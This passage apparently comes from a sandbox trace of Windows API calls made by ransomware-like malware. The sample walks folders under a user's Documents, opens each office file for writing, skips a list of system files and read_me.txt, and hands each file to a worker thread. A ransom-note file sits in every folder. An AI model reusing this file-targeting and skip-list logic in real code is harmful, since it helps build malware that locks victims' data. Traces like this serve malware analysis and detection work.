cAlternateFileName="")) returned 0 [0076.046] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.046] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\read_me.txt") returned 88 [0076.046] GetProcessHeap () returned 0x4f10000 [0076.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0076.046] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 50 [0076.046] GetProcessHeap () returned 0x4f10000 [0076.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bd00f0 | out: hHeap=0x4f10000) returned 1 [0076.047] GetProcessHeap () returned 0x4f10000 [0076.047] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0076.047] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\*") returned 68 [0076.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.047] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\.") returned 68 [0076.047] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6310cda0, ftCreationTime.dwHighDateTime=0x1d4c578, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.048] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\..") returned 69 [0076.048] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x24763a40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D n1NXFm_Av6aY4CwC", cAlternateFileName="DN1NXF~1")) returned 1 [0076.048] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC") returned 85 [0076.048] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79cddf60, ftCreationTime.dwHighDateTime=0x1d4ced8, ftLastAccessTime.dwLowDateTime=0xd7f6f7b0, ftLastAccessTime.dwHighDateTime=0x1d4cdad, ftLastWriteTime.dwLowDateTime=0xd7f6f7b0, ftLastWriteTime.dwHighDateTime=0x1d4cdad, nFileSizeHigh=0x0, nFileSizeLow=0x8fbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dg4oVF.pptx", cAlternateFileName="DG4OVF~1.PPT")) returned 1 [0076.048] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\dg4oVF.pptx") returned 78 [0076.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\dg4oVF.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\dg4ovf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="read_me.txt") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="desktop.ini") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="autorun.inf") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="iconcache.db") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="boot.ini") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.048] StrStrW (lpFirst="dg4ovf.pptx", lpSrch="thumbs.db") returned 0x0 [0076.048] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 86 [0076.048] QueueUserWorkItem (Function=0x404e00, Context=0x8d4, Flags=0x0) returned 1 [0076.048] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24763a40, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24763a40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.048] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\read_me.txt") returned 78 [0076.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d8 [0076.048] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.048] CloseHandle (hObject=0x8d8) returned 1 [0076.049] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3099240, ftCreationTime.dwHighDateTime=0x1d4d368, ftLastAccessTime.dwLowDateTime=0x271368d0, ftLastAccessTime.dwHighDateTime=0x1d4d00e, ftLastWriteTime.dwLowDateTime=0x271368d0, ftLastWriteTime.dwHighDateTime=0x1d4d00e, nFileSizeHigh=0x0, nFileSizeLow=0xa09e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_rKnr.rtf", cAlternateFileName="")) returned 1 [0076.049] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\_rKnr.rtf") returned 76 [0076.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\_rKnr.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\_rknr.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d8 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="read_me.txt") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="autoexec.bat") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="desktop.ini") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="autorun.inf") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="ntuser.dat") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="iconcache.db") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="bootsect.bak") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="boot.ini") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="ntuser.dat.log") returned 0x0 [0076.049] StrStrW (lpFirst="_rknr.rtf", lpSrch="thumbs.db") returned 0x0 [0076.049] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 87 [0076.049] QueueUserWorkItem (Function=0x404e00, Context=0x8d8, Flags=0x0) returned 1 [0076.049] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3099240, ftCreationTime.dwHighDateTime=0x1d4d368, ftLastAccessTime.dwLowDateTime=0x271368d0, ftLastAccessTime.dwHighDateTime=0x1d4d00e, ftLastWriteTime.dwLowDateTime=0x271368d0, ftLastWriteTime.dwHighDateTime=0x1d4d00e, nFileSizeHigh=0x0, nFileSizeLow=0xa09e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_rknr.rtf", cAlternateFileName="")) returned 0 [0076.049] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.049] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\read_me.txt") returned 78 [0076.049] GetProcessHeap () returned 0x4f10000 [0076.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0076.049] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 51 [0076.049] GetProcessHeap () returned 0x4f10000 [0076.049] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.050] GetProcessHeap () returned 0x4f10000 [0076.050] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.050] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\*") returned 87 [0076.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x24763a40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.050] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\.") returned 87 [0076.050] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98d78e50, ftCreationTime.dwHighDateTime=0x1d4ca8d, ftLastAccessTime.dwLowDateTime=0x24763a40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.050] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\..") returned 88 [0076.050] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4241dc50, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0x8f2e290, ftLastAccessTime.dwHighDateTime=0x1d4caaf, ftLastWriteTime.dwLowDateTime=0x8f2e290, ftLastWriteTime.dwHighDateTime=0x1d4caaf, nFileSizeHigh=0x0, nFileSizeLow=0xa268, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CkixSmIJpPRf0.odp", cAlternateFileName="CKIXSM~1.ODP")) returned 1 [0076.050] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\CkixSmIJpPRf0.odp") returned 103 [0076.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\CkixSmIJpPRf0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\ckixsmijpprf0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="read_me.txt") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="autoexec.bat") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="desktop.ini") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="autorun.inf") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="ntuser.dat") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="iconcache.db") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="bootsect.bak") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="boot.ini") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="ntuser.dat.log") returned 0x0 [0076.050] StrStrW (lpFirst="ckixsmijpprf0.odp", lpSrch="thumbs.db") returned 0x0 [0076.050] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 88 [0076.050] QueueUserWorkItem (Function=0x404e00, Context=0x8dc, Flags=0x0) returned 1 [0076.051] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae36390, ftCreationTime.dwHighDateTime=0x1d4cd9e, ftLastAccessTime.dwLowDateTime=0xa5ccaf30, ftLastAccessTime.dwHighDateTime=0x1d4d43f, ftLastWriteTime.dwLowDateTime=0xa5ccaf30, ftLastWriteTime.dwHighDateTime=0x1d4d43f, nFileSizeHigh=0x0, nFileSizeLow=0x3c04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dp PC3.docx", cAlternateFileName="DPPC3~1.DOC")) returned 1 [0076.051] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\dp PC3.docx") returned 97 [0076.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\dp PC3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\dp pc3.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="read_me.txt") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="autoexec.bat") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="desktop.ini") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="autorun.inf") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="ntuser.dat") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="iconcache.db") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="bootsect.bak") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="boot.ini") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.051] StrStrW (lpFirst="dp pc3.docx", lpSrch="thumbs.db") returned 0x0 [0076.051] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 89 [0076.051] QueueUserWorkItem (Function=0x404e00, Context=0x8e0, Flags=0x0) returned 1 [0076.051] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982a6d70, ftCreationTime.dwHighDateTime=0x1d4cb95, ftLastAccessTime.dwLowDateTime=0x632bf6a0, ftLastAccessTime.dwHighDateTime=0x1d4c971, ftLastWriteTime.dwLowDateTime=0x632bf6a0, ftLastWriteTime.dwHighDateTime=0x1d4c971, nFileSizeHigh=0x0, nFileSizeLow=0x178cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FHeC3PnEp1b9.odt", cAlternateFileName="FHEC3P~1.ODT")) returned 1 [0076.051] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\FHeC3PnEp1b9.odt") returned 102 [0076.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\FHeC3PnEp1b9.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\fhec3pnep1b9.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0076.051] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="read_me.txt") returned 0x0 [0076.051] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="autoexec.bat") returned 0x0 [0076.051] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="desktop.ini") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="autorun.inf") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="ntuser.dat") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="iconcache.db") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="bootsect.bak") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="boot.ini") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="ntuser.dat.log") returned 0x0 [0076.052] StrStrW (lpFirst="fhec3pnep1b9.odt", lpSrch="thumbs.db") returned 0x0 [0076.052] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 90 [0076.052] QueueUserWorkItem (Function=0x404e00, Context=0x8e4, Flags=0x0) returned 1 [0076.052] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a478a0, ftCreationTime.dwHighDateTime=0x1d4d503, ftLastAccessTime.dwLowDateTime=0xf6e0a580, ftLastAccessTime.dwHighDateTime=0x1d4cdd6, ftLastWriteTime.dwLowDateTime=0xf6e0a580, ftLastWriteTime.dwHighDateTime=0x1d4cdd6, nFileSizeHigh=0x0, nFileSizeLow=0x155fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J3VBujVyzaSO.rtf", cAlternateFileName="J3VBUJ~1.RTF")) returned 1 [0076.052] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\J3VBujVyzaSO.rtf") returned 102 [0076.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\J3VBujVyzaSO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\j3vbujvyzaso.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e8 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="read_me.txt") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="autoexec.bat") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="desktop.ini") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="autorun.inf") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="ntuser.dat") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="iconcache.db") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="bootsect.bak") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="boot.ini") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="ntuser.dat.log") returned 0x0 [0076.052] StrStrW (lpFirst="j3vbujvyzaso.rtf", lpSrch="thumbs.db") returned 0x0 [0076.052] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 91 [0076.052] QueueUserWorkItem (Function=0x404e00, Context=0x8e8, Flags=0x0) returned 1 [0076.052] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24763a40, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24763a40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\read_me.txt") returned 97 [0076.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0076.053] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.053] CloseHandle (hObject=0x8ec) returned 1 [0076.053] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edaa140, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x6e1ce960, ftLastAccessTime.dwHighDateTime=0x1d4d3ef, ftLastWriteTime.dwLowDateTime=0x6e1ce960, ftLastWriteTime.dwHighDateTime=0x1d4d3ef, nFileSizeHigh=0x0, nFileSizeLow=0x1059, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_zNOJv_bA_jWdzqFVz.ots", cAlternateFileName="_ZNOJV~1.OTS")) returned 1 [0076.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\_zNOJv_bA_jWdzqFVz.ots") returned 108 [0076.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\_zNOJv_bA_jWdzqFVz.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\l7ier\\d n1nxfm_av6ay4cwc\\_znojv_ba_jwdzqfvz.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="read_me.txt") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="autoexec.bat") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="desktop.ini") returned 0x0 [0076.053] 